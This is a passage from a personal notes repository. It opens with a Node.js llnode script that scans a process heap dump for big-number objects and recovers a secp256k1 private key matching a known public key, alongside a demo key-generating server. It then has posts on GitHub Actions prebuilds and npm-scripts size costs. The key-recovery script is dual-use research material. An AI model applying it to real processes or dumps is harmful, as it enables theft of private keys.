| console.log(`Found ${bnHeapType ? bnHeapType.instanceCount : 0} BN instances.`) 19 | 20 | if (!bnHeapType) { 21 | console.log(`No BN instances, exit`) 22 | process.exit(1) 23 | } 24 | 25 | for (const { value } of bnHeapType.instances[Symbol.iterator]()) { 26 | if (value.endsWith('')) continue 27 | 28 | const negative = parseInt(value.match(/negative=(\d+)/)[1], 10) 29 | const wordsAddr = value.match(/words=(0x.[0-9a-f]+):/)[1] 30 | const length = parseInt(value.match(/length=(\d+)/)[1], 10) 41 | } 42 | 43 | if (bn.cmp(secp256k1.curve.n) >= 0 || bn.isZero()) continue 44 | 45 | const kp = secp256k1.keyFromPrivate(bn) 46 | const pubkey = kp.getPublic(true, 'hex') 47 | if (pubkey === knownPubKey) { 48 | console.log(`Found private key for given public key!`) 49 | console.log(`${kp.getPrivate('hex')} => ${kp.getPublic(true, 'hex')}`) 50 | break 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /2019-12-18-llnode-elliptic/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "elliptic": "^6.5.2", 4 | "llnode": "^2.2.0" 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /2019-12-18-llnode-elliptic/server.js: -------------------------------------------------------------------------------- 1 | const http = require('http') 2 | const EC = require('elliptic').ec 3 | 4 | const secp256k1 = new EC('secp256k1') 5 | 6 | const server = http.createServer((req, res) => { 7 | const keypair = secp256k1.genKeyPair() 8 | const seckey = keypair.getPrivate('hex') 9 | const pubkey = keypair.getPublic(true, 'hex') 10 | console.log(`${seckey} => ${pubkey}`) 11 | 12 | res.end(pubkey + '\n') 13 | 14 | if (global.gc) setTimeout(global.gc, 100) 15 | }) 16 | 17 | server.on('error', (err) => { 18 | console.error(err.stack || err) 19 | process.exit(1) 20 | }) 21 | 22 | const port = 8000 23 | server.listen(port, (err) => console.log(`Server at localhost:${port} (pid: ${process.pid})`)) 24 | --------------------------------------------------------------------------------
/2019-12-18-llnode-elliptic/yarn.lock: -------------------------------------------------------------------------------- 1 | # THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. 2 | # yarn lockfile v1 3 | 4 | 5 | bindings@^1.3.0: 6 | version "1.5.0" 7 | resolved "https://registry.yarnpkg.com/bindings/-/bindings-1.5.0.tgz#10353c9e945334bc0511a6d90b38fbc7c9c504df" 8 | integrity sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ== 9 | dependencies: 10 | file-uri-to-path "1.0.0" 11 | 12 | bn.js@^4.4.0: 13 | version "4.11.8" 14 | resolved "https://registry.yarnpkg.com/bn.js/-/bn.js-4.11.8.tgz#2cde09eb5ee341f484746bb0309b3253b1b1442f" 15 | integrity sha512-ItfYfPLkWHUjckQCk8xC+LwxgK8NYcXywGigJgSwOP8Y2iyWT4f2vsZnoOXTTbo+o5yXmIUJ4gn5538SO5S3gA== 16 | 17 | brorand@^1.0.1: 18 | version "1.1.0" 19 | resolved "https://registry.yarnpkg.com/brorand/-/brorand-1.1.0.tgz#12c25efe40a45e3c323eb8675a0a0ce57b22371f" 20 | integrity sha1-EsJe/kCkXjwyPrhnWgoM5XsiNx8= 21 | 22 | elliptic@^6.5.2: 23 | version "6.5.2" 24 | resolved "https://registry.yarnpkg.com/elliptic/-/elliptic-6.5.2.tgz#05c5678d7173c049d8ca433552224a495d0e3762" 25 | integrity sha512-f4x70okzZbIQl/NSRLkI/+tteV/9WqL98zx+SQ69KbXxmVrmjwsNUPn/gYJJ0sHvEak24cZgHIPegRePAtA/xw== 26 | dependencies: 27 | bn.js "^4.4.0" 28 | brorand "^1.0.1" 29 | hash.js "^1.0.0" 30 | hmac-drbg "^1.0.0" 31 | inherits "^2.0.1" 32 | minimalistic-assert "^1.0.0" 33 | minimalistic-crypto-utils "^1.0.0" 34 | 35 | file-uri-to-path@1.0.0: 36 | version "1.0.0" 37 | resolved "https://registry.yarnpkg.com/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz#553a7b8446ff6f684359c445f1e37a05dacc33dd" 38 | integrity sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw== 39 | 40 | hash.js@^1.0.0, hash.js@^1.0.3: 41 | version "1.1.7" 42 | resolved "https://registry.yarnpkg.com/hash.js/-/hash.js-1.1.7.tgz#0babca538e8d4ee4a0f8988d68866537a003cf42" 43 | integrity sha512-taOaskGt4z4SOANNseOviYDvjEJinIkRgmp7LbKP2YTTmVxWBl87s/uzK9r+44BclBSp2X7K1hqeNfz9JbBeXA== 44 | dependencies: 45 | inherits "^2.0.3" 46 | minimalistic-assert "^1.0.1" 47 | 48 | hmac-drbg@^1.0.0: 49 | version "1.0.1" 50 | resolved "https://registry.yarnpkg.com/hmac-drbg/-/hmac-drbg-1.0.1.tgz#d2745701025a6c775a6c545793ed502fc0c649a1" 51 | integrity sha1-0nRXAQJabHdabFRXk+1QL8DGSaE= 52 | dependencies: 53 | hash.js "^1.0.3" 54 | minimalistic-assert "^1.0.0" 55 | minimalistic-crypto-utils "^1.0.1" 56 | 57 | inherits@^2.0.1, inherits@^2.0.3: 58 | version "2.0.4" 59 | resolved "https://registry.yarnpkg.com/inherits/-/inherits-2.0.4.tgz#0fa2c64f932917c3433a0ded55363aae37416b7c" 60 | integrity sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ== 61 | 62 | llnode@^2.2.0: 63 | version "2.2.0" 64 | resolved "https://registry.yarnpkg.com/llnode/-/llnode-2.2.0.tgz#376d5588bafb8219837141829cdf42056f92bf44" 65 | integrity sha512-bNTjFMEjvO5iYOmX1HWtqUKuWyOo7nLv2KSEyEv3oojbmzBcp8ZesGVCdmHThL0kF8kcQPjdyWgb1mEsc/1uSg== 66 | dependencies: 67 | bindings "^1.3.0" 68 | node-addon-api "^1.1.0" 69 | 70 | minimalistic-assert@^1.0.0, minimalistic-assert@^1.0.1: 71 | version "1.0.1" 72 | resolved "https://registry.yarnpkg.com/minimalistic-assert/-/minimalistic-assert-1.0.1.tgz#2e194de044626d4a10e7f7fbc00ce73e83e4d5c7" 73 | integrity sha512-UtJcAD4yEaGtjPezWuO9wC4nwUnVH/8/Im3yEHQP4b67cXlD/Qr9hdITCU1xDbSEXg2XKNaP8jsReV7vQd00/A== 74 | 75 | minimalistic-crypto-utils@^1.0.0, minimalistic-crypto-utils@^1.0.1: 76 | version "1.0.1" 77 
| resolved "https://registry.yarnpkg.com/minimalistic-crypto-utils/-/minimalistic-crypto-utils-1.0.1.tgz#f6c00c1c0b082246e5c4d99dfb8c7c083b2b582a" 78 | integrity sha1-9sAMHAsIIkblxNmd+4x8CDsrWCo= 79 | 80 | node-addon-api@^1.1.0: 81 | version "1.7.1" 82 | resolved "https://registry.yarnpkg.com/node-addon-api/-/node-addon-api-1.7.1.tgz#cf813cd69bb8d9100f6bdca6755fc268f54ac492" 83 | integrity sha512-2+DuKodWvwRTrCfKOeR24KIc5unKjOh8mz17NCzVnHWfjAdDqbfbjqh7gUT+BkXBRQM52+xCHciKWonJ3CbJMQ== 84 | -------------------------------------------------------------------------------- /2020-01-02-github-actions-for-prebuildify/README.md: -------------------------------------------------------------------------------- 1 | # GitHub Actions for prebuilding Node.js Addons 2 | 3 | ### Node.js Addons 4 | 5 | Node.js Addons well described in [documentation](https://nodejs.org/api/addons.html). In general addons provide an interface between JavaScript and C/C++. 6 | 7 | While we can implement a lot of things on JavaScript sometimes it's not wise reinvent the wheel and could be good use already existed libraries. Especially which can be faster, because JavaScript is high-level language with garbage collector. In the end built-in modules are limited with things which you can do in OS. That's why in some cases we need it. 8 | 9 | ### Addons history 10 | 11 | [Addons](https://nodejs.org/api/addons.html) existed in Node.js all time which I remember it (and I used it in June 2013). It's very low level and you need work directly with V8 with some macroses defined by node header. Problem here, that node and V8 are not frozen and change things from time to time, so if you want support more than one version at one time, you will need a lot of `#if` directives and at the end code will be mess. 12 | 13 | Obvious solution with supporting more than one version was create some set of macroses. This was done at August 2013 with [NAN](https://github.com/nodejs/nan). And while this is great project some disadvantages exists. First, NAN version can be major bumped and you will have choice, drop old versions or add new ¯\\_(ツ)_/¯. On new V8 release NAN should be updated (if it was fixed to some specific version) and probably you will need update own code. And of course if you change node version on OS, you will need recompile addons, because previously they was compiled for usage other API. 14 | 15 | In January 2016 Microsoft created Pull Request [nodejs/node/pull/4765](https://github.com/nodejs/node/pull/4765) which brings [ChakraCore](https://github.com/microsoft/chakracore) to Node.js as V8 alternative. In less than 3 months Pull Request with Node API was created: [nodejs/node/pull/11975](https://github.com/nodejs/node/pull/11975). N-API (Node API) was great idea, because we received additional layer which have stable ABI what means that we do not need recompile our modules between node versions anymore. In future only new things will be added and `NAPI_VERSION` will be increased, but rest still will be here (see [N-API Version Matrix](https://nodejs.org/api/n-api.html#n_api_n_api_version_matrix)). 16 | 17 | 31 December 2019 was last day when node@8 was supported (see [End-of-Life Releases](https://github.com/nodejs/Release#end-of-life-releases)) and every supported node version have N-API enabled by default (in node@8 it was still experimental feature, required activation by flag). 
So now we do not need to use V8 directly or NAN; all we need is [N-API](https://nodejs.org/api/n-api.html) (low level) or [node-addon-api](https://github.com/nodejs/node-addon-api) as a C++ wrapper around N-API. 18 | 19 | ### Addons building 20 | 21 | The simplest way is to just ship the package code with a `binding.gyp`; the package manager (npm/yarn) will build the addon automatically for developers who install the package. The problem is that developers need to have the tools for it, and while on Linux/macOS a lot of things exist by default, setting up a build environment on Windows can be a hard job. Of course, this will be done on each package installation and should be done again if the node version changes. Another point is that library headers (if libraries are used) should exist, which sometimes requires the installation of extra packages. Finally, if the installation is run with `--ignore-scripts` (or if this is set to `true` globally), nothing will be compiled. 22 | 23 | As a result, tools like [prebuild](https://github.com/prebuild/prebuild) / [prebuildify](https://github.com/prebuild/prebuildify) were created. 24 | 25 | The prebuild idea (July 2016) was great: we compile modules for some node versions and upload them somewhere (GitHub Release Assets, usually). When the package is installed, the `install` script checks the node version and downloads the prebuilt addon. In this case we do not need a compilation environment. But we still depend on the node version and the `install` script. 26 | 27 | Prebuildify (January 2017) is an improved version of prebuild. Instead of uploading prebuilt addons, we ship them with the package itself. As a result, if the required prebuilt addon is included, we can change the node version without problems. From this moment we also stop depending on the `install` script (if the prebuild exists), and the problem that an uploaded prebuild can be changed at any time disappears (we do not have a checksum anywhere and do not check it on downloading). An interesting thing is that installation of a package with all prebuilds included is usually faster than downloading one version from some other place, and package managers usually cache packages, so a second installation is much faster. 28 | 29 | ### Building automation 30 | 31 | While it's good to have prebuild and prebuildify, we still need to build our addon somehow. Of course we can do it locally, but in this case we need cross-compilation tools, and building for the 3 major OSes is probably available only on macOS. Also, sometimes cross-compilation is just not possible. All this is really hard. And every maintainer who makes releases would have to set up this environment. 32 | 33 | The obvious thing here is to use CI/CD: 34 | 35 | - [Travis CI](https://travis-ci.org/): Linux/MacOS 36 | - [CircleCI](https://circleci.com/): Linux/Windows (+MacOS with paid subscription) 37 | - [AppVeyor](https://www.appveyor.com/): Linux/MacOS/Windows 38 | - [GitHub Actions](https://github.com/features/actions): Linux/MacOS/Windows 39 | 40 | I have used all of them; each has its own advantages and disadvantages, but at the current moment, for OSS, I prefer GitHub Actions. 41 | 42 | Looking back, when [prebuild-ci](https://github.com/prebuild/prebuild-ci) was released, we used Travis for Linux/MacOS and AppVeyor for Windows. 43 | 44 | ### Puzzle solved 45 | 46 | So, right now the best choice, in my opinion, is to use `node-addon-api` and `GitHub Actions`. `NAN` does not make sense for new addons. `GitHub Actions` has only one totally free alternative, `AppVeyor`, but my personal experience with it is not good. 47 | 48 |
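For context: a package built with prebuildify typically loads its addon through [node-gyp-build](https://github.com/prebuild/node-gyp-build), which picks a bundled prebuild matching the current platform and falls back to a locally compiled build. A minimal sketch, assuming the standard prebuildify layout:

```js
// index.js of a prebuildify-based package: node-gyp-build looks in
// ./prebuilds for an addon matching the current platform/arch and
// falls back to ./build if no prebuild fits.
module.exports = require('node-gyp-build')(__dirname)
```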
49 | <details><summary>GitHub Actions pipeline</summary> 50 | 51 | ```yaml 52 | name: Build addon, run tests and package 53 | 54 | on: [push, pull_request] 55 | 56 | jobs: 57 | build-and-test: 58 | name: Build addon 59 | runs-on: ${{ matrix.os }} 60 | strategy: 61 | matrix: 62 | os: 63 | - macos-latest 64 | - ubuntu-latest 65 | - windows-latest 66 | steps: 67 | - name: Fetch code 68 | uses: actions/checkout@v1 69 | with: 70 | submodules: true 71 | 72 | - name: Install dependencies 73 | run: yarn install --ignore-scripts 74 | 75 | - name: Build addon 76 | run: make build-addon 77 | 78 | - name: Get minimal Node.js version from package.json (Linux & macOS) 79 | id: node-version-nix 80 | if: runner.os != 'Windows' 81 | run: echo "::set-output name=version::$(node -p 'require("./package.json").engines.node.match(/(\d.*)$/)[0]')" 82 | 83 | - name: Use Node.js ${{ steps.node-version-nix.outputs.version }} (Linux & macOS) 84 | if: runner.os != 'Windows' 85 | uses: actions/setup-node@v1 86 | with: 87 | node-version: ${{ steps.node-version-nix.outputs.version }} 88 | 89 | - name: Get minimal Node.js version from package.json (Windows) 90 | id: node-version-win 91 | if: runner.os == 'Windows' 92 | run: echo "::set-output name=version::$(node -p 'require(\"./package.json\").engines.node.match(/(\d.*)$/)[0]')" 93 | 94 | - name: Use Node.js ${{ steps.node-version-win.outputs.version }} (Windows) 95 | if: runner.os == 'Windows' 96 | uses: actions/setup-node@v1 97 | with: 98 | node-version: ${{ steps.node-version-win.outputs.version }} 99 | 100 | - name: Run tests for addon 101 | run: make test-tap 102 | 103 | - name: Upload prebuilds 104 | uses: actions/upload-artifact@v1 105 | with: 106 | name: addon-${{ runner.os }} 107 | path: prebuilds 108 | 109 | package: 110 | name: Build package 111 | needs: build-and-test 112 | runs-on: ubuntu-latest 113 | steps: 114 | - name: Fetch code 115 | uses: actions/checkout@v1 116 | with: 117 | fetch-depth: 1 118 | 119 | - name: Install dependencies 120 | run: yarn install --ignore-scripts 121 | 122 | - name: Download macOS addon 123 | uses: actions/download-artifact@v1 124 | with: 125 | name: addon-macOS 126 | 127 | - name: Download Linux addon 128 | uses: actions/download-artifact@v1 129 | with: 130 | name: addon-Linux 131 | 132 | - name: Download Windows addon 133 | uses: actions/download-artifact@v1 134 | with: 135 | name: addon-Windows 136 | 137 | - name: Move addons to one folder 138 | run: mkdir prebuilds && mv ./addon-*/* ./prebuilds/ 139 | 140 | - name: list 141 | run: find prebuilds 142 | 143 | - name: Build package 144 | run: make package 145 | 146 | - name: Get package version from package.json 147 | id: pkg-version 148 | run: echo "::set-output name=version::$(node -p 'require("./package.json").version')" 149 | 150 | - name: Upload package 151 | uses: actions/upload-artifact@v1 152 | with: 153 | name: package 154 | path: keccak-${{ steps.pkg-version.outputs.version }}.tgz 155 | ``` 156 | </details>
157 | 158 | This is a real pipeline from [cryptocoinjs/keccak](https://github.com/cryptocoinjs/keccak/). While we have a lot of steps here, things are simple: 159 | 160 | - build the addon on different operating systems 161 | - save it as artifacts 162 | - start a new job 163 | - download all the compiled addons from the previous job 164 | - build the package 165 | - save the package as an artifact 166 | 167 | All we need to do when the job is complete is download the package and publish it. The whole process is very smooth. 168 | 169 | _**Happy addons building in 2020!**_ 170 | -------------------------------------------------------------------------------- /2020-01-12-cost-of-npm-scripts/README.md: -------------------------------------------------------------------------------- 1 | # The costs of npm-scripts 2 | 3 | 7-8 years ago, when I started working with [Node.js](https://nodejs.org/en/), build automation tools like [Grunt](https://gruntjs.com/) and [Gulp](https://gulpjs.com/) were used almost everywhere; sometimes it was [Make](https://www.gnu.org/software/make/). As time went by, build automation usage shifted from tools to simple [npm-scripts](https://docs.npmjs.com/misc/scripts). And I think it's good, because often we do not need complex things and a few simple commands are enough. npm-scripts are a good place for them. 4 | 5 | At the same time, I have not seen packages which remove unused `scripts` before package publishing or otherwise clean up `package.json`. And now there is a question: how much traffic overhead does the community receive from storing things in `package.json` and extra `scripts` for package management? 6 | 7 | So I wrote a small script to calculate the difference. The script accepts an npm lock file as input and downloads the packages. Each package is unpacked and the archive size is measured for: 8 | 9 | - Compressed original files. 10 | - Compressed original files with adjusted `npm-scripts`. 11 | - Compressed original files with adjusted `npm-scripts` and a stripped `package.json`. 12 | 13 | You can find the source code in [stats.js](./stats.js). Before running it, you need to install the dependencies with `yarn` (`yarn.lock` included). 14 | 15 | I thought about which packages I should use for the tests and decided on: [@babel/core](https://www.npmjs.com/package/@babel/core), [browserify](https://www.npmjs.com/package/browserify) and [webpack](https://www.npmjs.com/package/webpack). 16 | 17 | And the results which I received: 18 | 19 | - `@babel/core` (10,866,837 weekly downloads): 20 | 21 | ```bash 22 | noop: 1.31 MB (1306251) 23 | scripts: 1.31 MB (1305016), 1.24 kB (1235) 24 | used: 1.3 MB (1301408), 3.61 kB (3608), 4.84 kB (4843) 25 | ``` 26 | 27 | - `browserify` (647,447 weekly downloads): 28 | 29 | ```bash 30 | noop: 1.81 MB (1808257) 31 | scripts: 1.8 MB (1803016), 5.24 kB (5241) 32 | used: 1.79 MB (1793857), 9.16 kB (9159), 14.4 kB (14400) 33 | ``` 34 | 35 | - `webpack` (8,472,388 weekly downloads): 36 | 37 | ```bash 38 | noop: 5.42 MB (5422115) 39 | scripts: 5.41 MB (5410137), 12 kB (11978) 40 | used: 5.38 MB (5376882), 33.3 kB (33255), 45.2 kB (45233) 41 | ``` 42 | 43 | What do all these numbers mean? Let's calculate the difference for `webpack` as an example: 44 | 45 | If we remove undocumented `npm-scripts` from `package.json`, we save `12 kB (11978 bytes)`. With 8M weekly downloads this gives us: `11,978 * 8,472,388 / 7 / 1024^3 = 13.5 GiB / day`. 46 | 47 | If, in addition to removing undocumented `npm-scripts`, we remove undocumented (and not required) fields from `package.json`, we save `45.2 kB (45233 bytes)`.
With 8M weekly downloads this gives us: `45,233 * 8,472,388 / 7 / 1024^3 = 50.98 GiB / day`. 48 | 49 | All this math is very approximate, because part of the packages can be cached locally. But the numbers are really impressive: for `webpack` it's roughly `1.5 TiB/month` of text which is probably not used at all. 50 | -------------------------------------------------------------------------------- /2020-01-12-cost-of-npm-scripts/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "fs-extra": "^8.1.0", 4 | "glob": "^7.1.6", 5 | "pretty-bytes": "^5.3.0", 6 | "standard": "^14.3.1", 7 | "tar": "^5.0.5", 8 | "yargs": "^15.1.0" 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /2020-01-12-cost-of-npm-scripts/stats.js: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env node 2 | const fs = require('fs').promises 3 | const path = require('path') 4 | const https = require('https') 5 | const glob = require('glob') 6 | const fse = require('fs-extra') 7 | const tar = require('tar') 8 | const yargs = require('yargs') 9 | const prettyBytes = require('pretty-bytes') 10 | 11 | function getArgs () { 12 | return yargs 13 | .usage('Usage: $0 [options]') 14 | .wrap(yargs.terminalWidth()) 15 | .options({ 16 | lock: { 17 | alias: 'l', 18 | default: 'package-lock.json', 19 | description: 'Path to npm lock file', 20 | type: 'string' 21 | }, 22 | 'dir-packages': { 23 | coerce (dir) { 24 | fse.ensureDirSync(dir) 25 | return dir 26 | }, 27 | default: path.join(__dirname, 'packages'), 28 | description: 'Path to directory for downloading and process packages', 29 | type: 'string' 30 | } 31 | }) 32 | .help('help') 33 | .alias('help', 'h').argv 34 | } 35 | 36 | // helpers 37 | async function applyFn (list, fn, workers = 3) { 38 | const result = new Array(list.length) 39 | let i = 0 40 | await Promise.all(new Array(workers).fill(null).map(async () => { 41 | while (i < list.length) result[i] = await fn(list[i++]) 42 | })) 43 | return result 44 | } 45 | 46 | async function callback2promise (fn) { 47 | return new Promise((resolve, reject) => { 48 | return fn((err, ...args) => err ?
reject(err) : resolve(args)) 49 | }) 50 | } 51 | 52 | // package-lock.json parser 53 | async function getPackages (file, dirPackages) { 54 | const pkgs = [] 55 | 56 | const lockFileText = await fs.readFile(file, 'utf8') 57 | const deps = Object.values(JSON.parse(lockFileText).dependencies) 58 | while (deps.length > 0) { 59 | const { resolved, dependencies } = deps.pop() 60 | if (!resolved) continue 61 | if (!resolved.startsWith('https://')) { 62 | throw new Error(`URL not supported: "${resolved}"`) 63 | } 64 | 65 | const name = path.parse(resolved).base 66 | const dest = path.join(dirPackages, name) 67 | const destRepack = path.join(dirPackages, `${name}-repack`) 68 | const destUpdated = path.join(destRepack, name) 69 | const destPackageJSON = path.join(destRepack, 'package', 'package.json') 70 | 71 | pkgs.push({ 72 | name, 73 | dest, 74 | destRepack, 75 | destUpdated, 76 | destPackageJSON, 77 | url: resolved 78 | }) 79 | 80 | if (dependencies) deps.push(...Object.values(dependencies)) 81 | } 82 | 83 | return pkgs 84 | } 85 | 86 | // packages download 87 | async function makeRequest (url) { 88 | return new Promise((resolve, reject) => { 89 | const req = https.request(url) 90 | req.on('error', reject) 91 | req.on('timeout', () => { 92 | req.abort() 93 | reject(new Error('Timeout error')) 94 | }) 95 | req.on('response', (resp) => { 96 | if (resp.statusCode !== 200) { 97 | return reject(new Error(`"${resp.statusMessage}" is not OK.`)) 98 | } 99 | 100 | const chunks = [] 101 | resp.on('data', (chunk) => chunks.push(chunk)) 102 | resp.on('end', () => resolve(Buffer.concat(chunks))) 103 | }) 104 | 105 | req.end() 106 | }) 107 | } 108 | 109 | async function downloadPackage (pkg) { 110 | try { 111 | const stat = await fs.stat(pkg.dest) 112 | if (stat.isFile()) return 113 | 114 | throw new Error(`Package is not a file: ${pkg.dest}`) 115 | } catch (err) { 116 | if (err.code !== 'ENOENT') throw err 117 | } 118 | 119 | await fs.writeFile(pkg.dest, await makeRequest(pkg.url)) 120 | console.log(`Package downloaded: ${pkg.name}`) 121 | } 122 | 123 | // package.json change functions 124 | const requiredScriptsKeys = [ 125 | // 'prepublish', 126 | // 'prepare', 127 | // 'prepublishOnly', 128 | // 'prepack', 129 | // 'postpack', 130 | // 'publish', 131 | // 'postpublish', 132 | 'preinstall', 133 | 'install', 134 | 'postinstall', 135 | 'preuninstall', 136 | 'uninstall', 137 | 'postuninstall' 138 | // 'preversion', 139 | // 'version', 140 | // 'postversion', 141 | // 'pretest', 142 | // 'test', 143 | // 'posttest', 144 | // 'prestop', 145 | // 'stop', 146 | // 'poststop', 147 | // 'prestart', 148 | // 'start', 149 | // 'poststart', 150 | // 'prerestart', 151 | // 'restart', 152 | // 'postrestart', 153 | // 'preshrinkwrap', 154 | // 'shrinkwrap', 155 | // 'postshrinkwrap' 156 | ] 157 | 158 | const requiredPackageFields = [ 159 | 'name', 160 | 'version', 161 | 'description', 162 | 'keywords', 163 | 'homepage', 164 | 'bugs', 165 | 'license', 166 | 'author', 167 | 'contributors', 168 | // 'files', 169 | 'main', 170 | 'browser', 171 | 'bin', 172 | 'man', 173 | // 'directories', 174 | 'repository', 175 | 'scripts', 176 | // 'config', 177 | 'dependencies', 178 | // 'devDependencies', 179 | 'peerDependencies', 180 | // 'bundledDependencies', 181 | 'optionalDependencies', 182 | 'engines', 183 | 'os', 184 | 'cpu' 185 | // 'private', 186 | // 'publishConfig' 187 | ] 188 | 189 | const packageJSONUpdate = { 190 | noop (pkg) { 191 | return pkg 192 | }, 193 | scripts (pkg) { 194 | if (pkg.scripts === undefined) return pkg 
195 | 196 | const scripts = {} 197 | for (const [key, value] of Object.entries(pkg.scripts)) { 198 | if (requiredScriptsKeys.includes(key)) scripts[key] = value 199 | } 200 | pkg.scripts = scripts 201 | return pkg 202 | }, 203 | used (pkg) { 204 | pkg = packageJSONUpdate.scripts(pkg) 205 | const newPkg = {} 206 | for (const [key, value] of Object.entries(pkg)) { 207 | if (requiredPackageFields.includes(key)) newPkg[key] = value 208 | } 209 | return newPkg 210 | } 211 | } 212 | 213 | // package size 214 | async function getPackageSize (pkg, fileList, packageJSON) { 215 | await fs.writeFile(pkg.destPackageJSON, JSON.stringify(packageJSON)) 216 | 217 | await callback2promise((callback) => { 218 | // Options like in npm: https://github.com/npm/cli/blob/v6.13.6/lib/pack.js#L143 219 | const tarOpt = { 220 | file: pkg.destUpdated, 221 | cwd: pkg.destRepack, 222 | prefix: 'package/', 223 | portable: true, 224 | mtime: new Date('1985-10-26T08:15:00.000Z'), 225 | gzip: true 226 | } 227 | tar.create(tarOpt, fileList, callback) 228 | }) 229 | 230 | const stat = await fs.stat(pkg.destUpdated) 231 | return stat.size 232 | } 233 | 234 | async function getPackgeStats (pkg) { 235 | await fs.rmdir(pkg.destRepack, { recursive: true }) 236 | await fse.ensureDir(pkg.destRepack) 237 | await callback2promise((callback) => { 238 | tar.extract({ 239 | cwd: pkg.destRepack, 240 | file: pkg.dest 241 | }, callback) 242 | }) 243 | 244 | const [fileList] = await callback2promise((callback) => { 245 | glob('**', { 246 | cwd: pkg.destRepack, 247 | nodir: true 248 | }, callback) 249 | }) 250 | 251 | const packageJSONContent = await fs.readFile(pkg.destPackageJSON, 'utf8') 252 | const packageJSON = JSON.parse(packageJSONContent) 253 | 254 | const stats = {} 255 | for (const [name, updateFn] of Object.entries(packageJSONUpdate)) { 256 | stats[name] = await getPackageSize(pkg, fileList, updateFn(packageJSON)) 257 | } 258 | return stats 259 | } 260 | 261 | // 262 | async function main () { 263 | const args = getArgs() 264 | 265 | // read packages from JSON files 266 | const pkgs = await getPackages(args.lock, args.dirPackages) 267 | 268 | // download packages 269 | await applyFn(pkgs, downloadPackage) 270 | 271 | // get package stats 272 | const stats = await applyFn(pkgs, getPackgeStats) 273 | 274 | // calculate total stats 275 | const tStats = stats.reduce((total, obj) => { 276 | for (const key of Object.keys(total)) total[key] += obj[key] 277 | return total 278 | }) 279 | 280 | // print stats 281 | const p2s = (v) => `${prettyBytes(v)} (${v})` 282 | console.log(`noop: ${p2s(tStats.noop)}`) 283 | console.log(`scripts: ${p2s(tStats.scripts)}, ${p2s(tStats.noop - tStats.scripts)}`) 284 | console.log(`used: ${p2s(tStats.used)}, ${p2s(tStats.scripts - tStats.used)}, ${p2s(tStats.noop - tStats.used)}`) 285 | } 286 | 287 | main().catch((err) => { 288 | console.error(err.stack || err) 289 | process.exit(1) 290 | }) 291 | -------------------------------------------------------------------------------- /3rd-party-bookmarked-notes.md: -------------------------------------------------------------------------------- 1 | ## Interesting notes for reading 2 | 3 | - [Node.js](https://nodejs.org/) 4 | 5 | - [Node.js Guides](https://nodejs.org/en/docs/guides/) by Node.js Foundation 6 | - [V8 JavaScript engine: Blog, Docs, JS/WASM features](https://v8.dev/) 7 | - [Node.js event loop](https://blog.insiderattack.net/event-loop-and-the-big-picture-nodejs-event-loop-part-1-1cb67a182810) (5 notes series) by Deepal Jayasekara 8 | - [v8 and thus 
Node.js performance](https://github.com/thlorenz/v8-perf) by Thorsten Lorenz 9 | 10 | - [WebAssembly](https://webassembly.org/) 11 | 12 | - [Compiling C to WebAssembly without Emscripten](https://dassur.ma/things/c-to-webassembly/) by Surma 13 | 14 | - [Docker](https://www.docker.com/), [Kubernetes](https://kubernetes.io/) and related 15 | 16 | - [What happens when I type kubectl run](https://github.com/jamiehannaford/what-happens-when-k8s) by Jamie Hannaford 17 | - Resource limits in kubernetes: [memory](https://medium.com/@betz.mark/understanding-resource-limits-in-kubernetes-memory-6b41e9a955f9?source=---------6------------------) and [cpu time](https://medium.com/@betz.mark/understanding-resource-limits-in-kubernetes-cpu-time-9eff74d3161b?source=---------5------------------) by Mark Betz 18 | - [Docker network benchmark](http://rabexc.org/posts/docker-networking) by Carlo Contavalli 19 | - [Kubernetes Services and Iptables](https://msazure.club/kubernetes-services-and-iptables/) 20 | 21 | - [git](https://git-scm.com/) 22 | 23 | - [Encrypt secrets in git](https://blog.maddevs.io/secrets-513d41eaaf43) [in Russian] by Oleg Puzanov 24 | 25 | - Blogs / Notes / Sites 26 | 27 | - [Brendan D. Gregg](http://www.brendangregg.com/) 28 | - [Julia Evans](https://jvns.ca/) 29 | - [Vyacheslav Egorov](https://mrale.ph/) 30 | - [Frank DENIS](https://00f.net/) 31 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | clean: 2 | # ansible 3 | find -name *.retry -type f -exec rm -rv {} + 4 | 5 | # terraform 6 | find -name .terraform -type d -exec rm -rv {} + 7 | find -name terraform.tfstate -type f -exec rm -rv {} + 8 | find -name terraform.tfstate.backup -type f -exec rm -rv {} + 9 | 10 | # node.js 11 | find -name build -type d -exec rm -rf {} + 12 | find -name node_modules -type d -exec rm -rf {} + 13 | find -name package-lock.json -type f -exec rm -rv {} + 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Some notes stored in [git](https://git-scm.com/) ([Markdown](https://daringfireball.net/projects/markdown/) mostly) and published on [github.com/fanatid/notes](https://github.com/fanatid/notes/). 2 | 3 | Not a native English speaker, please excuse any language mistakes.
